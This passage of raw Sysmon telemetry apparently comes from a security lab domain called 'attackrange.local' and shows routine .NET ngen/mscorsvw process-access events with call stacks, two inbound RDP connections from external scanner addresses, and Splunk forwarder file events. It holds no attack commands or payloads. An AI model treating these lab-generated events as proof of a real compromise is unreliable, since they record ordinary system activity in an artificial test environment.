crosoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.030{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-5C0D-00000000BB01}5920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.014{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-5C0D-00000000BB01}5920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.014{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-5C0D-00000000BB01}5920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.951{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEC-607E-5B0D-00000000BB01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.936{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.936{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000050329Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:47.445{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55803-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050328Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:49.885{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFC87AF170FBED7AE24DE381037D3071,SHA256=DD34FA3ABEE60A86DB08248DF3E6AD8E536BE1CDD009F3951E669C46ABDE422E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050327Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:49.588{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51E2CA16A815EA8205CE2C869F06CCA5,SHA256=F06A8F5993CD97E1464B65BF734EC5C71D5F09F6FFBAAA7A4698B041ED62D265,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.936{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-6F0D-00000000BB01}820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.920{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-6F0D-00000000BB01}820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.920{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-6F0D-00000000BB01}820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.873{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-6E0D-00000000BB01}1436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.858{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-6E0D-00000000BB01}1436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.858{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-6E0D-00000000BB01}1436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000076259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:48.902{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-48926-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.764{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-6D0D-00000000BB01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.748{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-6D0D-00000000BB01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.748{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-6D0D-00000000BB01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.670{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-6C0D-00000000BB01}4004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.655{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-6C0D-00000000BB01}4004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.655{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-6C0D-00000000BB01}4004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.592{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-6B0D-00000000BB01}2976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.576{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-6B0D-00000000BB01}2976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.576{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-6B0D-00000000BB01}2976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 